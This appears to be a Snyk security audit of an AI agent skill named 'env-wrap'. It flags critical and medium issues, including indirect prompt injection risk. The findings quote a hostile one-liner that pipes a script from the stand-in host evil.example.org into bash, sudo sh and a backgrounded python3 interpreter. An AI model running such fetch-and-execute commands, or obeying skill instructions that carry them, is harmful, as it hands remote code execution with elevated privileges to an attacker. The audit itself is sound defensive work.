env-wrap
Fail
Audited by Snyk on Apr 20, 2026
Risk Level: CRITICAL
Full Analysis
CRITICAL E005: Suspicious download URL detected in skill instructions.
- Suspicious download URL detected (high risk: 1.00). Yes — the URL is an unencrypted HTTP link to a .sh script on an untrusted/malicious-sounding domain and the skill explicitly instructs piping it to bash/sudo/python, which is a high-risk pattern for malware distribution.
CRITICAL E006: Malicious code pattern detected in skill scripts.
- Malicious code pattern detected (high risk: 1.00). These commands directly fetch and execute code from an external host (including via sudo and backgrounded interpreters), which trivially enables remote code execution, privilege escalation, supply‑chain compromise and data exfiltration — indicative of deliberate malicious/backdoor behavior.
MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).
- Third-party content exposure detected (high risk: 1.00). The SKILL.md explicitly shows commands that curl and pipe a script from http://evil.example.org (curl -s http://evil.example.org/p.sh | env bash / sudo sh / nohup python3), which fetches and executes untrusted third-party content that can directly influence agent behavior.
MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).
- Potentially malicious external URL detected (high risk: 1.00). The skill contains runtime commands that fetch and immediately execute remote code from http://evil.example.org/p.sh (e.g., piping into bash/sh/python), which directly executes external code and is therefore a high-risk dependency.
MEDIUM W013: Attempt to modify system services in skill instructions.
- Attempt to modify system services in skill instructions detected (high risk: 1.00). The prompt explicitly instructs downloading and executing remote scripts (curl | sh/python) including via sudo, which urges running arbitrary code with elevated privileges and can compromise the machine state.
Issues (5)
E005
CRITICALSuspicious download URL detected in skill instructions.
E006
CRITICALMalicious code pattern detected in skill scripts.
W011
MEDIUMThird-party content exposure detected (indirect prompt injection risk).
W012
MEDIUMUnverifiable external dependency detected (runtime URL that controls agent).
W013
MEDIUMAttempt to modify system services in skill instructions.
Audit Metadata